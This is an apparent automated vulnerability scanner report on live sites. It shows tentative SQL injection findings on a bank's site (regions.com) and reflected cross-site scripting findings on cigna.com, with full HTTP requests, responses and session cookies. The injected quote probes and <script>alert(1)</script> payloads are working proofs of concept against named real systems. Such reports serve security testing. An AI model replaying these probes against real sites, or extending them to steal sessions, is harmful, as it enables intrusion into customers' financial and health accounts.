Cookie: WWW.REGIONS.COM-HTTP=R825062118; ASP.NET_SessionId=xjtyx3551jnl3uif034d0255; WT_FPC=id=2fc78c79fedd795ea741305555382886:lv=1305555382886:ss=1305555382886; WWW.REGIONS.COM-HTTPS=R492750743

Response 1 (redirected)

HTTP/1.1 302 Found
Set-Cookie: WWW.REGIONS.COM-HTTP=R825062118; path=/
Date: Mon, 16 May 2011 15:19:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.regions.com/siteerror.aspx
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 154

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.regions.com/siteerror.aspx">here</a>.</h2>
</body></html>

Request 2

GET /personal_banking''/online_banking_help.rf HTTP/1.1
Host: www.regions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WWW.REGIONS.COM-HTTP=R825062118; ASP.NET_SessionId=xjtyx3551jnl3uif034d0255; WT_FPC=id=2fc78c79fedd795ea741305555382886:lv=1305555382886:ss=1305555382886; WWW.REGIONS.COM-HTTPS=R492750743

Response 2 (redirected)

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTP=R825062118; path=/
Cache-Control: private
Date: Mon, 16 May 2011 15:19:56 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 17340


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><titl
...[SNIP]...
1.43. http://www.regions.com/personal_banking/online_security.rf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.regions.com
Path:   /personal_banking/online_security.rf

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /personal_banking'/online_security.rf HTTP/1.1
Host: www.regions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xjtyx3551jnl3uif034d0255; WT_FPC=id=2fc78c79fedd795ea741305555382886:lv=1305555412882:ss=1305555382886; aspnetForm=OnlineID:%27#toggleboxid:on; WWW.REGIONS.COM-HTTP=R825062118; WWW.REGIONS.COM-HTTPS=R492750743

Response 1

HTTP/1.1 302 Found
Set-Cookie: WWW.REGIONS.COM-HTTP=R825062118; path=/
Date: Mon, 16 May 2011 15:20:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /SiteError.aspx?aspxerrorpath=/personal_banking'/online_security.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 194

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fSiteError.aspx%3faspxerrorpath%3d%2fpersonal_banking'%2fonline_security.rf">here</a>.</h2>
</body></html>

Request 2

GET /personal_banking''/online_security.rf HTTP/1.1
Host: www.regions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xjtyx3551jnl3uif034d0255; WT_FPC=id=2fc78c79fedd795ea741305555382886:lv=1305555412882:ss=1305555382886; aspnetForm=OnlineID:%27#toggleboxid:on; WWW.REGIONS.COM-HTTP=R825062118; WWW.REGIONS.COM-HTTPS=R492750743

Response 2

HTTP/1.1 302 Found
Set-Cookie: WWW.REGIONS.COM-HTTP=R825062118; path=/
Date: Mon, 16 May 2011 15:20:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /404.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 126

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2f404.rf">here</a>.</h2>
</body></html>
1.44. http://www.regions.com/personal_banking/open_account.rf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.regions.com
Path:   /personal_banking/open_account.rf

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /personal_banking'/open_account.rf HTTP/1.1
Host: www.regions.com
Proxy-Connection: keep-alive
Referer: http://www.regions.com/personal_banking/loans_credit.rf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xjtyx3551jnl3uif034d0255; aspnetForm=OnlineID:%27#toggleboxid:on; WWW.REGIONS.COM-HTTPS=R492750743; WWW.REGIONS.COM-HTTP=R825062118; WT_FPC=id=2fc78c79fedd795ea741305555382886:lv=1305555436808:ss=1305555382886

Response 1

HTTP/1.1 302 Found
Set-Cookie: WWW.REGIONS.COM-HTTP=R825062118; path=/
Date: Mon, 16 May 2011 15:21:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /SiteError.aspx?aspxerrorpath=/personal_banking'/open_account.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 191

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fSiteError.aspx%3faspxerrorpath%3d%2fpersonal_banking'%2fopen_account.rf">here</a>.</h2>
</body></html>

Request 2

GET /personal_banking''/open_account.rf HTTP/1.1
Host: www.regions.com
Proxy-Connection: keep-alive
Referer: http://www.regions.com/personal_banking/loans_credit.rf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xjtyx3551jnl3uif034d0255; aspnetForm=OnlineID:%27#toggleboxid:on; WWW.REGIONS.COM-HTTPS=R492750743; WWW.REGIONS.COM-HTTP=R825062118; WT_FPC=id=2fc78c79fedd795ea741305555382886:lv=1305555436808:ss=1305555382886

Response 2

HTTP/1.1 302 Found
Set-Cookie: WWW.REGIONS.COM-HTTP=R825062118; path=/
Date: Mon, 16 May 2011 15:21:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /404.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 126

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2f404.rf">here</a>.</h2>
</body></html>
2. Cross-site scripting (reflected)  previous  next
There are 33 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

2.1. http://cigna.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cigna.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 75b7d<script>alert(1)</script>b5413ef51e0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico75b7d<script>alert(1)</script>b5413ef51e0 HTTP/1.1
Host: cigna.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=173.193.214.243-1234505376.30151644:lv=1305559757583:ss=1305559757583; __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.1.10.1305559758

Response

HTTP/1.1 404 Not found
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 15:29:36 GMT
Content-type: text/html; charset=utf-8
Content-Length: 15705

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<b>/favicon.ico75b7d<script>alert(1)</script>b5413ef51e0</b>
...[SNIP]...
2.2. http://cigna.com/login_registration/index.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cigna.com
Path:   /login_registration/index.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 53ee6<script>alert(1)</script>63c836bfb50 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /login_registration53ee6<script>alert(1)</script>63c836bfb50/index.html HTTP/1.1
Host: cigna.com
Proxy-Connection: keep-alive
Referer: http://cigna.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1234505376.30151644:lv=1305559773497:ss=1305559757583; __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.2.10.1305559758

Response

HTTP/1.1 404 Not found
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 15:30:14 GMT
Content-type: text/html; charset=utf-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<b>/login_registration53ee6<script>alert(1)</script>63c836bfb50/index.html</b>
...[SNIP]...
2.3. http://cigna.com/login_registration/index.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cigna.com
Path:   /login_registration/index.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fde21<script>alert(1)</script>e5bcadbc356 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /login_registration/index.htmlfde21<script>alert(1)</script>e5bcadbc356 HTTP/1.1
Host: cigna.com
Proxy-Connection: keep-alive
Referer: http://cigna.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1234505376.30151644:lv=1305559773497:ss=1305559757583; __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.2.10.1305559758

Response

HTTP/1.1 404 Not found
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 15:30:19 GMT
Content-type: text/html; charset=utf-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<b>/login_registration/index.htmlfde21<script>alert(1)</script>e5bcadbc356</b>
...[SNIP]...
2.4. http://cigna.com/sites/toolkit/managers_disability/home.htm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cigna.com
Path:   /sites/toolkit/managers_disability/home.htm

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 89d66<script>alert(1)</script>919d3f45b2b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites89d66<script>alert(1)</script>919d3f45b2b/toolkit/managers_disability/home.htm HTTP/1.1
Host: cigna.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1234505376.30151644:lv=1305559782420:ss=1305559757583; __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758

Response

HTTP/1.1 404 Not found
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 15:30:23 GMT
Content-type: text/html; charset=utf-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<b>/sites89d66<script>alert(1)</script>919d3f45b2b/toolkit/managers_disability/home.htm</b>
...[SNIP]...
2.5. http://cigna.com/sites/toolkit/managers_disability/home.htm [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cigna.com
Path:   /sites/toolkit/managers_disability/home.htm

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ef80a<script>alert(1)</script>48d4a60f3f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/toolkitef80a<script>alert(1)</script>48d4a60f3f/managers_disability/home.htm HTTP/1.1
Host: cigna.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1234505376.30151644:lv=1305559782420:ss=1305559757583; __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758

Response

HTTP/1.1 404 Not found
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 15:30:29 GMT
Content-type: text/html; charset=utf-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<b>/sites/toolkitef80a<script>alert(1)</script>48d4a60f3f/managers_disability/home.htm</b>
...[SNIP]...
2.6. http://cigna.com/sites/toolkit/managers_disability/home.htm [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cigna.com
Path:   /sites/toolkit/managers_disability/home.htm

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8584b<script>alert(1)</script>de6d80b3cf2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/toolkit/managers_disability8584b<script>alert(1)</script>de6d80b3cf2/home.htm HTTP/1.1
Host: cigna.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1234505376.30151644:lv=1305559782420:ss=1305559757583; __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758

Response

HTTP/1.1 404 Not found
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 15:30:40 GMT
Content-type: text/html; charset=utf-8
Content-Length: 15736

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<b>/sites/toolkit/managers_disability8584b<script>alert(1)</script>de6d80b3cf2/home.htm</b>
...[SNIP]...
2.7. http://cigna.com/sites/toolkit/managers_disability/home.htm [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cigna.com
Path:   /sites/toolkit/managers_disability/home.htm

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 802b0<script>alert(1)</script>44abdc7d08 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/toolkit/managers_disability/home.htm802b0<script>alert(1)</script>44abdc7d08 HTTP/1.1
Host: cigna.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1234505376.30151644:lv=1305559782420:ss=1305559757583; __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758

Response

HTTP/1.1 404 Not found
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 15:30:46 GMT
Content-type: text/html; charset=utf-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<b>/sites/toolkit/managers_disability/home.htm802b0<script>alert(1)</script>44abdc7d08</b>
...[SNIP]...
2.8. http://cigna.com/sites/toolkit/managers_disability/return/index.htm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cigna.com
Path:   /sites/toolkit/managers_disability/return/index.htm

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f9a72<script>alert(1)</script>de756e927fc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sitesf9a72<script>alert(1)</script>de756e927fc/toolkit/managers_disability/return/index.htm HTTP/1.1
Host: cigna.com
Proxy-Connection: keep-alive
Referer: http://cigna.com/sites/toolkit/managers_disability/home.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1234505376.30151644:lv=1305559782420:ss=1305559757583; __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTSID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C

Response

HTTP/1.1 404 Not found
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 15:31:20 GMT
Content-type: text/html; charset=utf-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<b>/sitesf9a72<script>alert(1)</script>de756e927fc/toolkit/managers_disability/return/index.htm</b>
...[SNIP]...
2.9. http://cigna.com/sites/toolkit/managers_disability/return/index.htm [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cigna.com
Path:   /sites/toolkit/managers_disability/return/index.htm

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c9efd<script>alert(1)</script>a51c3f8dc29 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/toolkitc9efd<script>alert(1)</script>a51c3f8dc29/managers_disability/return/index.htm HTTP/1.1
Host: cigna.com
Proxy-Connection: keep-alive
Referer: http://cigna.com/sites/toolkit/managers_disability/home.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1234505376.30151644:lv=1305559782420:ss=1305559757583; __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTSID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C

Response

HTTP/1.1 404 Not found
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 15:31:31 GMT
Content-type: text/html; charset=utf-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<b>/sites/toolkitc9efd<script>alert(1)</script>a51c3f8dc29/managers_disability/return/index.htm</b>
...[SNIP]...
2.10. http://cigna.com/sites/toolkit/managers_disability/return/index.htm [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cigna.com
Path:   /sites/toolkit/managers_disability/return/index.htm

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8f337<script>alert(1)</script>a1ab20d2a80 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/toolkit/managers_disability8f337<script>alert(1)</script>a1ab20d2a80/return/index.htm HTTP/1.1
Host: cigna.com
Proxy-Connection: keep-alive
Referer: http://cigna.com/sites/toolkit/managers_disability/home.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1234505376.30151644:lv=1305559782420:ss=1305559757583; __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTSID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C

Response

HTTP/1.1 404 Not found
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 15:31:37 GMT
Content-type: text/html; charset=utf-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<b>/sites/toolkit/managers_disability8f337<script>alert(1)</script>a1ab20d2a80/return/index.htm</b>
...[SNIP]...
2.11. http://cigna.com/sites/toolkit/managers_disability/return/index.htm [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cigna.com
Path:   /sites/toolkit/managers_disability/return/index.htm

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b7469<script>alert(1)</script>2bbe4b818d7 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

